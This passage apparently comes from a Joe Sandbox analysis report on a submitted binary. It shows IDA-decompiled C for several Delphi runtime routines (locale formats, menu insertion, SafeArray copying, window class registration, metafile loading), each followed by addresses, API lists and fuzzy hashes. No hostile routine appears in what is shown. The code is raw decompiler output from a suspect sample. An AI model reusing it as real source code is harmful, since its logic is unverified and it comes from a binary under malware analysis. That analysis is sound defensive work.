				E0040C420(_t43, 0x40e044, 0x1b,  &_v24);
				 *0x490684 = E0040938C(0x40e044, 0, _t196);
				E0040C420(_t132, 0x40e044, 0x1c,  &_v28);
				 *0x490685 = E0040938C(0x40e044, 0, _t196);
				 *0x490686 = E0040C46C(_t132, 0x2c, 0xf);
				 *0x490687 = E0040C46C(_t132, 0x2e, 0xe);
				E0040C420(_t132, 0x40e044, 0x19,  &_v32);
				 *0x490688 = E0040938C(0x40e044, 0, _t196);
				 *0x490689 = E0040C46C(_t132, 0x2f, 0x1d);
				E0040C420(_t132, "m/d/yy", 0x1f,  &_v40);
				E0040C758(_v40, _t132,  &_v36, _t190, _t191, _t196);
				E00404A94(0x49068c, _v36);
				E0040C420(_t132, "mmmm d, yyyy", 0x20,  &_v48);
				E0040C758(_v48, _t132,  &_v44, _t190, _t191, _t196);
				E00404A94(0x490690, _v44);
				 *0x490694 = E0040C46C(_t132, 0x3a, 0x1e);
				E0040C420(_t132, 0x40e078, 0x28,  &_v52);
				E00404A94(0x490698, _v52);
				E0040C420(_t132, 0x40e084, 0x29,  &_v56);
				E00404A94(0x49069c, _v56);
				E00404A40( &_v12);
				E00404A40( &_v16);
				E0040C420(_t132, 0x40e044, 0x25,  &_v60);
				_t104 = E0040938C(0x40e044, 0, _t196);
				_t197 = _t104;
				if(_t104 != 0) {
					E00404AD8( &_v8, 0x40e09c);
				} else {
					E00404AD8( &_v8, 0x40e090);
				}
				E0040C420(_t132, 0x40e044, 0x23,  &_v64);
				_t111 = E0040938C(0x40e044, 0, _t197);
				_t198 = _t111;
				if(_t111 == 0) {
					E0040C420(_t132, 0x40e044, 0x1005,  &_v68);
					if(E0040938C(0x40e044, 0, _t198) != 0) {
						E00404AD8( &_v12, 0x40e0b8);
					} else {
						E00404AD8( &_v16, 0x40e0a8);
					}
				}
				_push(_v12);
				_push(_v8);
				_push(":mm");
				_push(_v16);
				E00404DC0();
				_push(_v12);
				_push(_v8);
				_push(":mm:ss");
				_push(_v16);
				E00404DC0();
				 *0x49074e = E0040C46C(_t132, 0x2c, 0xc);
				_pop(_t183);
				 *[fs:eax] = _t183;
				_push(E0040E036);
				return E00404A64( &_v68, 0x10);
			}

























      0x0040dd64
      0x0040dd64
      0x0040dd65
      0x0040dd67
      0x0040dd6c
      0x0040dd6c
      0x0040dd6e
      0x0040dd70
      0x0040dd70
      0x0040dd73
      0x0040dd76
      0x0040dd77
      0x0040dd7c
      0x0040dd7f
      0x0040dd82
      0x0040dd87
      0x0040dd8c
      0x0040dd93
      0x0040dd95
      0x0040dd95
      0x0040dd9f
      0x0040ddae
      0x0040ddbb
      0x0040ddd0
      0x0040dddf
      0x0040ddf4
      0x0040de03
      0x0040de16
      0x0040de29
      0x0040de3e
      0x0040de4d
      0x0040de60
      0x0040de75
      0x0040de80
      0x0040de8d
      0x0040dea2
      0x0040dead
      0x0040deba
      0x0040decd
      0x0040dee2
      0x0040deef
      0x0040df04
      0x0040df11
      0x0040df19
      0x0040df21
      0x0040df36
      0x0040df40
      0x0040df45
      0x0040df47
      0x0040df60
      0x0040df49
      0x0040df51
      0x0040df51
      0x0040df75
      0x0040df7f
      0x0040df84
      0x0040df86
      0x0040df98
      0x0040dfa9
      0x0040dfc2
      0x0040dfab
      0x0040dfb3
      0x0040dfb3
      0x0040dfa9
      0x0040dfc7
      0x0040dfca
      0x0040dfcd
      0x0040dfd2
      0x0040dfdf
      0x0040dfe4
      0x0040dfe7
      0x0040dfea
      0x0040dfef
      0x0040dffc
      0x0040e00f
      0x0040e016
      0x0040e019
      0x0040e01c
      0x0040e02e

      APIs
      • GetThreadLocale.KERNEL32(00000000,0040E02F,?,?,00000000,00000000), ref: 0040DD9A
        • Part of subcall function 0040C420: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040C43E
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Locale$InfoThread
      • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
      • API String ID: 4232894706-2493093252
      • Opcode ID: 579f7d9d91358018fffc3f22276be57aed883a1dfb48e9bf89f8310b21094002
      • Instruction ID: 3a5c4ef11a2410a6d7c78f4c3c508f84bd0185972b61034dc139baa5e1d59508
      • Opcode Fuzzy Hash: 579f7d9d91358018fffc3f22276be57aed883a1dfb48e9bf89f8310b21094002
      • Instruction Fuzzy Hash: BD6161707001489BDB10FBA6D89169F76A6AB88304F50943BB601BB3C6CA3DDD198B5D
      Uniqueness

      Uniqueness Score: -1.00%

      Function 004547EC Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 187windowCOMMON
      Download Yara Rule
      C-Code - Quality: 87%
      			E004547EC(void* __eax, void* __ebx, char __ecx, struct HMENU__* __edx, void* __edi, void* __esi) {
				char _v5;
				char _v12;
				char _v13;
				struct tagMENUITEMINFOA _v61;
				char _v68;
				intOrPtr _t103;
				CHAR* _t109;
				char _t115;
				short _t149;
				void* _t154;
				intOrPtr _t161;
				intOrPtr _t184;
				struct HMENU__* _t186;
				int _t190;
				void* _t192;
				intOrPtr _t193;
				void* _t196;
				void* _t205;

				_t155 = __ecx;
				_v68 = 0;
				_v12 = 0;
				_v5 = __ecx;
				_t186 = __edx;
				_t154 = __eax;
				_push(_t196);
				_push(0x454a47);
				_push( *[fs:eax]);
				 *[fs:eax] = _t196 + 0xffffffc0;
				if( *((char*)(__eax + 0x3e)) == 0) {
					L22:
					_pop(_t161);
					 *[fs:eax] = _t161;
					_push(0x454a4e);
					E00404A40( &_v68);
					return E00404A40( &_v12);
				}
				E00404AD8( &_v12,  *((intOrPtr*)(__eax + 0x30)));
				if(E004567A8(_t154) <= 0) {
					__eflags =  *((short*)(_t154 + 0x60));
					if( *((short*)(_t154 + 0x60)) == 0) {
						L8:
						if((GetVersion() & 0x000000ff) < 4) {
							_t190 =  *(0x48eda8 + ((E00404E4C( *((intOrPtr*)(_t154 + 0x30)), 0x454a6c) & 0xffffff00 | __eflags == 0x00000000) & 0x0000007f) * 4) |  *0x0048ED9C |  *0x0048ED8C |  *0x0048ED94 | 0x00000400;
							_t103 = E004567A8(_t154);
							__eflags = _t103;
							if(_t103 <= 0) {
								InsertMenuA(_t186, 0xffffffff, _t190,  *(_t154 + 0x50) & 0x0000ffff, E00404F00(_v12));
							} else {
								_t109 = E00404F00( *((intOrPtr*)(_t154 + 0x30)));
								InsertMenuA(_t186, 0xffffffff, _t190 | 0x00000010, E00454CFC(_t154), _t109);
							}
							goto L22;
						}
						_v61.cbSize = 0x2c;
						_v61.fMask = 0x3f;
						_t192 = E00456D64(_t154);
						if(_t192 == 0 ||  *((char*)(_t192 + 0x40)) == 0 && E00456380(_t154) == 0) {
							if( *((intOrPtr*)(_t154 + 0x4c)) == 0) {
								L14:
								_t115 = 0;
								goto L16;
							}
							_t205 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t154 + 0x4c)))) + 0x1c))();
							if(_t205 == 0) {
								goto L15;
							}
							goto L14;
						} else {
							L15:
							_t115 = 1;
							L16:
							_v13 = _t115;
							_v61.fType =  *(0x48eddc + ((E00404E4C( *((intOrPtr*)(_t154 + 0x30)), 0x454a6c) & 0xffffff00 | _t205 == 0x00000000) & 0x0000007f) * 4) |  *0x0048EDD4 |  *0x0048EDB0 |  *0x0048EDE4 |  *0x0048EDEC;
							_v61.fState =  *0x0048EDBC |  *0x0048EDCC |  *0x0048EDC4;
							_v61.wID =  *(_t154 + 0x50) & 0x0000ffff;
							_v61.hSubMenu = 0;
							_v61.hbmpChecked = 0;
							_v61.hbmpUnchecked = 0;
							_v61.dwTypeData = E00404F00(_v12);
							if(E004567A8(_t154) > 0) {
								_v61.hSubMenu = E00454CFC(_t154);
							}
							InsertMenuItemA(_t186, 0xffffffff, 0xffffffff,  &_v61);
							goto L22;
						}
					}
					_t193 =  *((intOrPtr*)(_t154 + 0x64));
					__eflags = _t193;
					if(_t193 == 0) {
						L7:
						_push(_v12);
						_push(0x454a60);
						E00453E50( *((intOrPtr*)(_t154 + 0x60)), _t154, _t155,  &_v68, _t193);
						_push(_v68);
						E00404DC0();
						goto L8;
					}
					__eflags =  *((intOrPtr*)(_t193 + 0x64));
					if( *((intOrPtr*)(_t193 + 0x64)) != 0) {
						goto L7;
					}
					_t184 =  *0x4536e0; // 0x45372c
					_t149 = E00403D88( *((intOrPtr*)(_t193 + 4)), _t184);
					__eflags = _t149;
					if(_t149 != 0) {
						goto L8;
					}
					goto L7;
				}
				_v61.hSubMenu = E00454CFC(_t154);
				goto L8;
			}





















      0x004547ec
      0x004547f7
      0x004547fa
      0x004547fd
      0x00454800
      0x00454802
      0x00454806
      0x00454807
      0x0045480c
      0x0045480f
      0x00454816
      0x00454a29
      0x00454a2b
      0x00454a2e
      0x00454a31
      0x00454a39
      0x00454a46
      0x00454a46
      0x00454822
      0x00454830
      0x0045483e
      0x00454843
      0x00454888
      0x00454896
      0x004549e2
      0x004549ea
      0x004549ef
      0x004549f1
      0x00454a24
      0x004549f3
      0x004549f6
      0x00454a0b
      0x00454a0b
      0x00000000
      0x004549f1
      0x0045489c
      0x004548a3
      0x004548b1
      0x004548b5
      0x004548cc
      0x004548da
      0x004548da
      0x00000000
      0x004548da
      0x004548d6
      0x004548d8
      0x00000000
      0x00000000
      0x00000000
      0x004548de
      0x004548de
      0x004548de
      0x004548e0
      0x004548e0
      0x0045492f
      0x00454956
      0x0045495d
      0x00454962
      0x00454967
      0x0045496c
      0x00454977
      0x00454983
      0x0045498c
      0x0045498c
      0x00454998
      0x00000000
      0x00454998
      0x004548b5
      0x00454845
      0x00454848
      0x0045484a
      0x00454864
      0x00454864
      0x00454867
      0x00454873
      0x00454878
      0x00454883
      0x00000000
      0x00454883
      0x0045484c
      0x00454850
      0x00000000
      0x00000000
      0x00454855
      0x0045485b
      0x00454860
      0x00454862
      0x00000000
      0x00000000
      0x00000000
      0x00454862
      0x00454839
      0x00000000

      APIs
      • InsertMenuItemA.USER32(?,000000FF,000000FF,0000002C), ref: 00454998
      • GetVersion.KERNEL32(00000000,00454A47), ref: 00454888
        • Part of subcall function 00454CFC: CreatePopupMenu.USER32(?,00454A03,00000000,00000000,00454A47), ref: 00454D17
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Menu$CreateInsertItemPopupVersion
      • String ID: ,$,7E$?
      • API String ID: 133695497-1365133851
      • Opcode ID: 72218391c00259681a95bd6d5928f9942da8ae401d1e62715851f693d6284658
      • Instruction ID: 442cd844d828040ee7ddf9df9b2df35bccadfead9cb9e6ee97a742b757651eba
      • Opcode Fuzzy Hash: 72218391c00259681a95bd6d5928f9942da8ae401d1e62715851f693d6284658
      • Instruction Fuzzy Hash: EF610234A042419BDB50EF6ADC8169E77F5BF89309B44487AED40EB397D638D889C71C
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0041058C Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141COMMON
      Download Yara Rule
      C-Code - Quality: 77%
      			E0041058C(short* __eax, intOrPtr __ecx, intOrPtr* __edx) {
				char _v260;
				char _v768;
				char _v772;
				short* _v776;
				intOrPtr _v780;
				char _v784;
				signed int _v788;
				intOrPtr _v792;
				signed short* _v796;
				char _v800;
				char _v804;
				intOrPtr* _v808;
				void* __ebp;
				signed char _t51;
				signed int _t58;
				void* _t66;
				intOrPtr* _t78;
				intOrPtr* _t96;
				void* _t98;
				void* _t100;
				void* _t103;
				void* _t104;
				intOrPtr* _t114;
				void* _t118;
				char* _t119;
				void* _t120;

				_t105 = __ecx;
				_v780 = __ecx;
				_t96 = __edx;
				_v776 = __eax;
				if(( *(__edx + 1) & 0x00000020) == 0) {
					E00410134(0x80070057);
				}
				_t51 =  *_t96;
				if((_t51 & 0x00000fff) != 0xc) {
					_push(_t96);
					_push(_v776);
					L0040EE20();
					return E00410134(_v776);
				} else {
					if((_t51 & 0x00000040) == 0) {
						_v796 =  *((intOrPtr*)(_t96 + 8));
					} else {
						_v796 =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 8))));
					}
					_v788 =  *_v796 & 0x0000ffff;
					_t98 = _v788 - 1;
					if(_t98 < 0) {
						L9:
						_push( &_v772);
						_t58 = _v788;
						_push(_t58);
						_push(0xc);
						L0040F274();
						_v792 = _t58;
						if(_v792 == 0) {
							E0040FE8C(_t105);
						}
						E004104E4(_v776);
						 *_v776 = 0x200c;
						 *((intOrPtr*)(_v776 + 8)) = _v792;
						_t100 = _v788 - 1;
						if(_t100 < 0) {
							L14:
							_t102 = _v788 - 1;
							if(E00410500(_v788 - 1, _t120) != 0) {
								L0040F28C();
								E00410134(_v796);
								L0040F28C();
								E00410134(_v792);
								_v780(_v792,  &_v260,  &_v804, _v796,  &_v260,  &_v800);
							}
							_t66 = E00410530(_t102, _t120);
						} else {
							_t103 = _t100 + 1;
							_t78 =  &_v768;
							_t114 =  &_v260;
							do {
								 *_t114 =  *_t78;
								_t114 = _t114 + 4;
								_t78 = _t78 + 8;
								_t103 = _t103 - 1;
							} while (_t103 != 0);
							do {
								goto L14;
							} while (_t66 != 0);
							return _t66;
						}
					} else {
						_t104 = _t98 + 1;
						_t118 = 0;
						_t119 =  &_v772;
						do {
							_v808 = _t119;
							_push(_v808 + 4);
							_t18 = _t118 + 1; // 0x1
							_push(_v796);
							L0040F27C();
							E00410134(_v796);
							_push( &_v784);
							_t21 = _t118 + 1; // 0x1
							_push(_v796);
							L0040F284();
							E00410134(_v796);
							 *_v808 = _v784 -  *((intOrPtr*)(_v808 + 4)) + 1;
							_t118 = _t118 + 1;
							_t119 = _t119 + 8;
							_t104 = _t104 - 1;
						} while (_t104 != 0);
						goto L9;
					}
				}
			}





























      0x0041058c
      0x00410598
      0x0041059e
      0x004105a0
      0x004105aa
      0x004105b1
      0x004105b1
      0x004105b6
      0x004105c4
      0x00410752
      0x00410759
      0x0041075a
      0x00000000
      0x004105ca
      0x004105cd
      0x004105df
      0x004105cf
      0x004105d4
      0x004105d4
      0x004105ee
      0x004105fa
      0x004105fd
      0x0041066a
      0x00410670
      0x00410671
      0x00410677
      0x00410678
      0x0041067a
      0x0041067f
      0x0041068c
      0x0041068e
      0x0041068e
      0x00410699
      0x004106a4
      0x004106b5
      0x004106be
      0x004106c1
      0x004106dd
      0x004106e4
      0x004106ef
      0x00410706
      0x0041070b
      0x00410725
      0x0041072a
      0x0041073d
      0x0041073d
      0x00410746
      0x004106c3
      0x004106c3
      0x004106c4
      0x004106ca
      0x004106d0
      0x004106d2
      0x004106d4
      0x004106d7
      0x004106da
      0x004106da
      0x004106dd
      0x00000000
      0x00000000
      0x00000000
      0x004106dd
      0x004105ff
      0x004105ff
      0x00410600
      0x00410602
      0x00410608
      0x0041060a
      0x00410619
      0x0041061a
      0x00410624
      0x00410625
      0x0041062a
      0x00410635
      0x00410636
      0x00410640
      0x00410641
      0x00410646
      0x00410661
      0x00410663
      0x00410664
      0x00410667
      0x00410667
      0x00000000
      0x00410608
      0x004105fd

      APIs
      • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 00410625
      • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 00410641
      • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0041067A
      • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 00410706
      • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 00410725
      • VariantCopy.OLEAUT32(?), ref: 0041075A
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: ArraySafe$BoundIndex$CopyCreateVariant
      • String ID:
      • API String ID: 351091851-3916222277
      • Opcode ID: 6771deac4e97dd39e9e1e90b55d8794207f0589d90c71d561f206bc82a88abcb
      • Instruction ID: 9dab50e4529243bf869c33cb0647a587d1e4903c392135f18991978b55060660
      • Opcode Fuzzy Hash: 6771deac4e97dd39e9e1e90b55d8794207f0589d90c71d561f206bc82a88abcb
      • Instruction Fuzzy Hash: 4E51E9759012199FCB61EB59C980BD9B3BDAF4D304F4041EAA548E7202DA78AFC5CF68
      Uniqueness

      Uniqueness Score: -1.00%

      Function 004480E8 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 134registryCOMMON
      Download Yara Rule
      C-Code - Quality: 84%
      			E004480E8(intOrPtr* __eax, intOrPtr __ebx, void* __edi, void* __esi) {
				char _v68;
				struct _WNDCLASSA _v108;
				intOrPtr _v116;
				signed char _v137;
				void* _v144;
				struct _WNDCLASSA _v184;
				char _v188;
				char _v192;
				char _v196;
				int _t52;
				void* _t53;
				intOrPtr _t86;
				intOrPtr _t104;
				intOrPtr _t108;
				void* _t109;
				intOrPtr* _t111;
				void* _t115;

				_t109 = __edi;
				_t94 = __ebx;
				_push(__ebx);
				_v196 = 0;
				_t111 = __eax;
				_push(_t115);
				_push(0x4482a9);
				_push( *[fs:eax]);
				 *[fs:eax] = _t115 + 0xffffff40;
				_t95 =  *__eax;
				 *((intOrPtr*)( *__eax + 0x98))();
				if(_v116 != 0 || (_v137 & 0x00000040) == 0) {
					L7:
					 *((intOrPtr*)(_t111 + 0x174)) = _v108.lpfnWndProc;
					_t52 = GetClassInfoA(_v108.hInstance,  &_v68,  &_v184);
					asm("sbb eax, eax");
					_t53 = _t52 + 1;
					if(_t53 == 0 || E00441700 != _v184.lpfnWndProc) {
						if(_t53 != 0) {
							UnregisterClassA( &_v68, _v108.hInstance);
						}
						_v108.lpfnWndProc = E00441700;
						_v108.lpszClassName =  &_v68;
						if(RegisterClassA( &_v108) == 0) {
							E0040E218(_t94, _t95, _t109, _t111);
						}
					}
					 *0x48ebd8 = _t111;
					_t96 =  *_t111;
					 *((intOrPtr*)( *_t111 + 0x9c))();
					if( *(_t111 + 0x180) == 0) {
						E0040E218(_t94, _t96, _t109, _t111);
					}
					if((GetWindowLongA( *(_t111 + 0x180), 0xfffffff0) & 0x40000000) != 0 && GetWindowLongA( *(_t111 + 0x180), 0xfffffff4) == 0) {
						SetWindowLongA( *(_t111 + 0x180), 0xfffffff4,  *(_t111 + 0x180));
					}
					E00409CBC( *((intOrPtr*)(_t111 + 0x64)));
					 *((intOrPtr*)(_t111 + 0x64)) = 0;
					E0044B468(_t111);
					E00445AE8(_t111, E00425B40( *((intOrPtr*)(_t111 + 0x68)), _t94, _t96), 0x30, 1);
					_t130 =  *((char*)(_t111 + 0x5c));
					if( *((char*)(_t111 + 0x5c)) != 0) {
						E00403DF8(_t111, _t130);
					}
					_pop(_t104);
					 *[fs:eax] = _t104;
					_push(0x4482b0);
					return E00404A40( &_v196);
				} else {
					_t94 =  *((intOrPtr*)(__eax + 4));
					if(_t94 == 0 || ( *(_t94 + 0x1c) & 0x00000002) == 0) {
						L6:
						_v192 =  *((intOrPtr*)(_t111 + 8));
						_v188 = 0xb;
						_t86 =  *0x48f890; // 0x423af8
						E00406A3C(_t86, _t95,  &_v196);
						_t95 = _v196;
						E0040CC28(_t94, _v196, 1, _t109, _t111, 0,  &_v192);
						E004043D0();
					} else {
						_t108 =  *0x4406ec; // 0x440738
						if(E00403D88(_t94, _t108) == 0) {
							goto L6;
						}
						_v116 = E0044B158(_t94);
					}
					goto L7;
				}
			}




















      0x004480e8
      0x004480e8
      0x004480f1
      0x004480f5
      0x004480fb
      0x004480ff
      0x00448100
      0x00448105
      0x00448108
      0x00448113
      0x00448115
      0x0044811f
      0x00448194
      0x00448197
      0x004481ac
      0x004481b4
      0x004481b6
      0x004481b9
      0x004481ca
      0x004481d4
      0x004481d4
      0x004481d9
      0x004481e3
      0x004481f2
      0x004481f4
      0x004481f4
      0x004481f2
      0x004481f9
      0x00448207
      0x00448209
      0x00448216
      0x00448218
      0x00448218
      0x00448230
      0x0044824e
      0x0044824e
      0x00448256
      0x0044825d
      0x00448262
      0x0044827a
      0x0044827f
      0x00448283
      0x0044828b
      0x0044828b
      0x00448292
      0x00448295
      0x00448298
      0x004482a8
      0x0044812a
      0x0044812a
      0x0044812f
      0x00448154
      0x00448157
      0x0044815d
      0x00448173
      0x00448178
      0x0044817d
      0x0044818a
      0x0044818f
      0x00448137
      0x00448139
      0x00448146
      0x00000000
      0x00000000
      0x0044814f
      0x0044814f
      0x00000000
      0x0044812f

      APIs
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: ClassLongWindow$InfoRegisterUnregister
      • String ID: @
      • API String ID: 717780171-2766056989
      • Opcode ID: fc52af3242f8fe44ece93e04f8093c28dd293eaf74805cf60824bf27036c892d
      • Instruction ID: 4e1d3de6b91343a7247f532c712740ead0f23468df892c52b6e02ea6696341c7
      • Opcode Fuzzy Hash: fc52af3242f8fe44ece93e04f8093c28dd293eaf74805cf60824bf27036c892d
      • Instruction Fuzzy Hash: DC51B270A007149BEB21EBA9CC81B9E77E8AF45308F1049BFE505E7391DB78AD45CB58
      Uniqueness

      Uniqueness Score: -1.00%

      Function 004647C4 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 132windowCOMMON
      Download Yara Rule
      APIs
      • GetActiveWindow.USER32 ref: 004647D7
      • GetWindowRect.USER32 ref: 00464831
      • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,?), ref: 00464869
      • MessageBoxA.USER32 ref: 004648AA
      • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,00464920,?,00000000,00464919), ref: 004648FA
      • SetActiveWindow.USER32(?,00464920,?,00000000,00464919), ref: 0046490B
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Window$Active$MessageRect
      • String ID: (
      • API String ID: 3147912190-3887548279
      • Opcode ID: b89756c5eee4fc665e40774029766d14bf2f5a081941e707a762cffb37895fdb
      • Instruction ID: e0e9d1010596eee813b013ea9cb6c66ebde7bd2f6c4cfe85e7d936f5e3224c64
      • Opcode Fuzzy Hash: b89756c5eee4fc665e40774029766d14bf2f5a081941e707a762cffb37895fdb
      • Instruction Fuzzy Hash: 70411C75E00108AFDB44EBA9CD95FAEB7F9EB88304F14446AF900E7392D678AD048B55
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00429304 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 122fileCOMMON
      Download Yara Rule
      C-Code - Quality: 94%
      			E00429304(void* __eax, void* __ebx, int __ecx, intOrPtr* __edx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				int _v12;
				BYTE* _v16;
				intOrPtr _v18;
				signed int _v24;
				short _v26;
				short _v28;
				short _v30;
				short _v32;
				char _v38;
				struct tagMETAFILEPICT _v54;
				intOrPtr _v118;
				intOrPtr _v122;
				struct tagENHMETAHEADER _v154;
				intOrPtr _t103;
				char* _t110;
				intOrPtr _t115;
				struct HENHMETAFILE__* _t119;
				struct HENHMETAFILE__* _t120;
				void* _t122;
				void* _t123;
				void* _t124;
				void* _t125;
				intOrPtr _t126;

				_t124 = _t125;
				_t126 = _t125 + 0xffffff68;
				_v12 = __ecx;
				_v8 = __edx;
				_t122 = __eax;
				E004291A0(__eax);
				_t110 =  &_v38;
				 *((intOrPtr*)( *_v8 + 0xc))(__edi, __esi, __ebx, _t123);
				if(_v38 != 0x9ac6cdd7 || E00427C60( &_v38) != _v18) {
					E00426DF0();
				}
				_v12 = _v12 - 0x16;
				_v16 = E00402ACC(_v12, 0x16, _t110);
				_t103 =  *((intOrPtr*)(_t122 + 0x28));
				 *[fs:eax] = _t126;
				 *((intOrPtr*)( *_v8 + 0xc))( *[fs:eax], 0x429473, _t124);
				 *((short*)( *((intOrPtr*)(_t122 + 0x28)) + 0x18)) = _v24;
				if(_v24 == 0) {
					_v24 = 0x60;
				}
				 *((intOrPtr*)(_t103 + 0xc)) = MulDiv(_v28 - _v32, 0x9ec, _v24 & 0x0000ffff);
